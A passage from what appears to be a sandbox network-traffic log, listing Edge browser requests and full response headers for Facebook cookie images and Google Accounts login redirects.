          permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(self), clipboard-write=(self), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
          cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
          x-content-type-options: nosniff
          timing-allow-origin: *
          strict-transport-security: max-age=15552000; preload
          x-fb-debug: 3+cM+osg9K6AqHy51HdQvTOJ3U8I0cS2KVpWj8xNDvReuNtoUfn4b8O8bZfI512C2kYEx96C1cGG5QH6cLJxDA==
          date: Thu, 04 Apr 2024 00:35:26 GMT
          content-length: 22180
        • flag-de
          GET
          https://www.facebook.com/images/cookies/cookie_info_card_image_2.png
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.35:443
          Request
          GET /images/cookies/cookie_info_card_image_2.png HTTP/2.0
          host: www.facebook.com
          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          content-type: image/png
          access-control-allow-origin: *
          content-md5: tjvKzjcx509sRQAttysmgw==
          edge-control: cache-maxage=86400s
          expires: Fri, 05 Apr 2024 04:53:10 GMT
          cache-control: public,max-age=86400
          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(self), clipboard-write=(self), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
          cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
          x-content-type-options: nosniff
          timing-allow-origin: *
          strict-transport-security: max-age=15552000; preload
          x-fb-debug: zPy0F6rYdlRrhQUZ/NW2qwfa7qxiT77l5IheqKMYEhljHIptDR++mTk7stn7HFqKeTWVCcTW09G0lUBAnwo4Pw==
          date: Thu, 04 Apr 2024 04:53:10 GMT
          content-length: 35554
        • flag-de
          GET
          https://www.facebook.com/images/cookies/cookie_info_card_image_3.png
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.35:443
          Request
          GET /images/cookies/cookie_info_card_image_3.png HTTP/2.0
          host: www.facebook.com
          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          content-type: image/png
          access-control-allow-origin: *
          content-md5: mXjbZp5JUjt62zr4DVYbGw==
          edge-control: cache-maxage=86400s
          expires: Fri, 05 Apr 2024 00:46:56 GMT
          cache-control: public,max-age=86400
          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(self), clipboard-write=(self), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
          cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
          x-content-type-options: nosniff
          timing-allow-origin: *
          strict-transport-security: max-age=15552000; preload
          x-fb-debug: O9tuOS9ePA0o8pc7q6PDsffPtpR8OKdBnNSFVfe/Bllz9eRlyvft7C/B0WIfG/Qj227Hd69aoL1+RF89r0gULw==
          date: Thu, 04 Apr 2024 00:46:56 GMT
          content-length: 17083
        • flag-de
          GET
          https://www.facebook.com/images/cookies/cookie_info_card_image_4.png
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.35:443
          Request
          GET /images/cookies/cookie_info_card_image_4.png HTTP/2.0
          host: www.facebook.com
          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          content-type: image/png
          access-control-allow-origin: *
          content-md5: VavMdY6kTjDMa/KajpYRaQ==
          edge-control: cache-maxage=86400s
          expires: Fri, 05 Apr 2024 04:31:11 GMT
          cache-control: public,max-age=86400
          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(self), clipboard-write=(self), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
          cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
          x-content-type-options: nosniff
          timing-allow-origin: *
          strict-transport-security: max-age=15552000; preload
          x-fb-debug: FzNYTHDqsj9Y+HevKKGshQs2FYQNkbrIBVn6xlTEys0RYvqU5NbzEmTA9XUCeXJmHRKPON3NmWhfxl9dHh29Rg==
          date: Thu, 04 Apr 2024 04:31:11 GMT
          content-length: 50380
        • flag-de
          GET
          https://www.facebook.com/images/cookies/cookie_info_popup_image_1.png
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.35:443
          Request
          GET /images/cookies/cookie_info_popup_image_1.png HTTP/2.0
          host: www.facebook.com
          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          content-type: image/png
          access-control-allow-origin: *
          content-md5: vq/Hc42i1NUD0re9tbXumw==
          edge-control: cache-maxage=86400s
          expires: Fri, 05 Apr 2024 03:21:39 GMT
          cache-control: public,max-age=86400
          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(self), clipboard-write=(self), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
          cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
          x-content-type-options: nosniff
          timing-allow-origin: *
          strict-transport-security: max-age=15552000; preload
          x-fb-debug: bxIjdsPxQo6fnpEagHoHxXvfjSQJb0qKx2gVMifMsg7qzIYJ4CvWjWuyjcvRmzpZW2MRWBIkvOP4TeFTS4YO4g==
          date: Thu, 04 Apr 2024 03:21:39 GMT
          content-length: 47514
        • flag-de
          GET
          https://www.facebook.com/images/cookies/cookie_info_popup_image_2.png
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.35:443
          Request
          GET /images/cookies/cookie_info_popup_image_2.png HTTP/2.0
          host: www.facebook.com
          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          content-type: image/png
          access-control-allow-origin: *
          content-md5: wRZKtl/35CrbFpdeWSFrBg==
          edge-control: cache-maxage=86400s
          expires: Fri, 05 Apr 2024 02:39:42 GMT
          cache-control: public,max-age=86400
          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(self), clipboard-write=(self), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
          cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
          x-content-type-options: nosniff
          timing-allow-origin: *
          origin-agent-cluster: ?0
          strict-transport-security: max-age=15552000; preload
          x-fb-debug: 5RMZolxh0NiySDQCvzQ2UiSvoCdfMvihi0t3siNhJzAAQKY/Ok1j88+H7ayuhUUeqXR/Wh19mAi1NGjoeBfj0w==
          date: Thu, 04 Apr 2024 02:39:42 GMT
          content-length: 21306
        • flag-de
          GET
          https://www.facebook.com/images/cookies/cookie_info_popup_image_3.png
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.35:443
          Request
          GET /images/cookies/cookie_info_popup_image_3.png HTTP/2.0
          host: www.facebook.com
          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          content-type: image/png
          access-control-allow-origin: *
          content-md5: YhcU5SV/bTVsWSaxO4wgGA==
          edge-control: cache-maxage=86400s
          expires: Fri, 05 Apr 2024 00:29:37 GMT
          cache-control: public,max-age=86400
          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(self), clipboard-write=(self), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
          cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
          x-content-type-options: nosniff
          timing-allow-origin: *
          strict-transport-security: max-age=15552000; preload
          x-fb-debug: AafVm3kk7HWFLfBWH1rMwi+Ms0SXlgHcsqEBbCWesYQS+ULffwejX5EsGVA5SULVoZXX2QpLMykSNM2HbZmxqQ==
          date: Thu, 04 Apr 2024 00:29:37 GMT
          content-length: 47657
        • flag-de
          GET
          https://www.facebook.com/images/cookies/cookie_info_popup_image_4.png
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.35:443
          Request
          GET /images/cookies/cookie_info_popup_image_4.png HTTP/2.0
          host: www.facebook.com
          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          content-type: image/png
          access-control-allow-origin: *
          content-md5: Ae8VnBRpCv1xxClCp11bLQ==
          edge-control: cache-maxage=86400s
          expires: Fri, 05 Apr 2024 02:44:31 GMT
          cache-control: public,max-age=86400
          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(self), clipboard-write=(self), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
          cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
          x-content-type-options: nosniff
          timing-allow-origin: *
          origin-agent-cluster: ?0
          strict-transport-security: max-age=15552000; preload
          x-fb-debug: NVP+klDkz9EexbcBpTcH/sebDnhccBeVKl0V2e6VlgDNK4pfVwPDTRsTUZk1MFfn9YsgZoog7IFLqCKVcS3Twg==
          date: Thu, 04 Apr 2024 02:44:31 GMT
          content-length: 38147
        • flag-be
          GET
          https://accounts.google.com/
          MicrosoftEdgeCP.exe
          Remote address:
          108.177.15.84:443
          Request
          GET / HTTP/2.0
          host: accounts.google.com
          accept: text/html, application/xhtml+xml, image/jxr, */*
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 302
          content-type: text/html; charset=UTF-8
          strict-transport-security: max-age=31536000; includeSubDomains
          set-cookie: __Host-GAPS=1:d1LVW--03DMTlUpSls6JD7f9aYQw5Q:GjdgE8sWndS7SiuR;Path=/;Expires=Sat, 04-Apr-2026 22:29:21 GMT;Secure;HttpOnly;Priority=HIGH
          x-frame-options: DENY
          content-security-policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
          location: https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
          content-encoding: gzip
          date: Thu, 04 Apr 2024 22:29:21 GMT
          expires: Thu, 04 Apr 2024 22:29:21 GMT
          cache-control: private, max-age=0
          x-content-type-options: nosniff
          x-xss-protection: 1; mode=block
          content-length: 257
          server: GSE
          alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        • flag-be
          GET
          https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
          MicrosoftEdgeCP.exe
          Remote address:
          108.177.15.84:443
          Request
          GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/2.0
          host: accounts.google.com
          accept: text/html, application/xhtml+xml, image/jxr, */*
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          cookie: __Host-GAPS=1:d1LVW--03DMTlUpSls6JD7f9aYQw5Q:GjdgE8sWndS7SiuR
          Response
          HTTP/2.0 302
          content-type: application/binary
          cache-control: no-cache, no-store, max-age=0, must-revalidate
          pragma: no-cache
          expires: Mon, 01 Jan 1990 00:00:00 GMT
          date: Thu, 04 Apr 2024 22:29:21 GMT
          location: https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=ARZ0qKIuVjc_3i5cwJNuj_qUNsaMCB46y8BQJ5B54qgOG1HwL_4LfJ8nUwV5T1aQVCUgRPBLk_UpZQ
          strict-transport-security: max-age=31536000; includeSubDomains
          content-security-policy: script-src 'unsafe-inline' https: http:;object-src 'none';base-uri 'self';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport;worker-src 'self'
          content-security-policy: require-trusted-types-for 'script';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport
          permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
          cross-origin-resource-policy: cross-origin
          cross-origin-opener-policy: unsafe-none
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          server: ESF
          content-length: 0
          x-xss-protection: 0
          x-content-type-options: nosniff
          alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        • flag-be
          GET
          https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=ARZ0qKIuVjc_3i5cwJNuj_qUNsaMCB46y8BQJ5B54qgOG1HwL_4LfJ8nUwV5T1aQVCUgRPBLk_UpZQ
          MicrosoftEdgeCP.exe
          Remote address:
          108.177.15.84:443
          Request
          GET /InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=ARZ0qKIuVjc_3i5cwJNuj_qUNsaMCB46y8BQJ5B54qgOG1HwL_4LfJ8nUwV5T1aQVCUgRPBLk_UpZQ HTTP/2.0
          host: accounts.google.com
          accept: text/html, application/xhtml+xml, image/jxr, */*
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          cookie: __Host-GAPS=1:d1LVW--03DMTlUpSls6JD7f9aYQw5Q:GjdgE8sWndS7SiuR
          Response
          HTTP/2.0 302
          content-type: text/html; charset=UTF-8
          x-frame-options: DENY
          cache-control: no-cache, no-store, max-age=0, must-revalidate
          pragma: no-cache
          expires: Mon, 01 Jan 1990 00:00:00 GMT
          date: Thu, 04 Apr 2024 22:29:21 GMT
          location: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ARZ0qKIkPd5m8tK7LDiCRzNEPdYPFeVxHwxwT_s6ZtLI7ImZ4RnazsWByJA12WLgoqUqs6XMJNKngw&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-670276307%3A1712269761405740&theme=mn&ddm=0
          strict-transport-security: max-age=31536000; includeSubDomains
          report-to: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
          content-security-policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
          content-security-policy: require-trusted-types-for 'script';report-uri /cspreport
          cross-origin-opener-policy-report-only: same-origin; report-to="coop_gse_qebhlk"
          content-encoding: gzip
          x-content-type-options: nosniff
          x-xss-protection: 1; mode=block
          content-length: 413
          server: GSE
          alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        • flag-be
          GET
          https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ARZ0qKIkPd5m8tK7LDiCRzNEPdYPFeVxHwxwT_s6ZtLI7ImZ4RnazsWByJA12WLgoqUqs6XMJNKngw&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-670276307%3A1712269761405740&theme=mn&ddm=0
          MicrosoftEdgeCP.exe
          Remote address:
          108.177.15.84:443
          Request
          GET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ARZ0qKIkPd5m8tK7LDiCRzNEPdYPFeVxHwxwT_s6ZtLI7ImZ4RnazsWByJA12WLgoqUqs6XMJNKngw&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-670276307%3A1712269761405740&theme=mn&ddm=0 HTTP/2.0
          host: accounts.google.com
          accept: text/html, application/xhtml+xml, image/jxr, */*
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          cookie: __Host-GAPS=1:d1LVW--03DMTlUpSls6JD7f9aYQw5Q:GjdgE8sWndS7SiuR
          Response
          HTTP/2.0 200
          content-type: text/html; charset=utf-8
          x-frame-options: DENY
          vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
          x-auto-login: realm=com.google&args=continue%3Dhttps://accounts.google.com/
          x-ua-compatible: IE=edge
          cache-control: no-cache, no-store, max-age=0, must-revalidate
          pragma: no-cache
          expires: Mon, 01 Jan 1990 00:00:00 GMT
          date: Thu, 04 Apr 2024 22:29:21 GMT
          strict-transport-security: max-age=31536000; includeSubDomains
          cross-origin-opener-policy-report-only: same-origin; report-to="AccountsSignInUi"
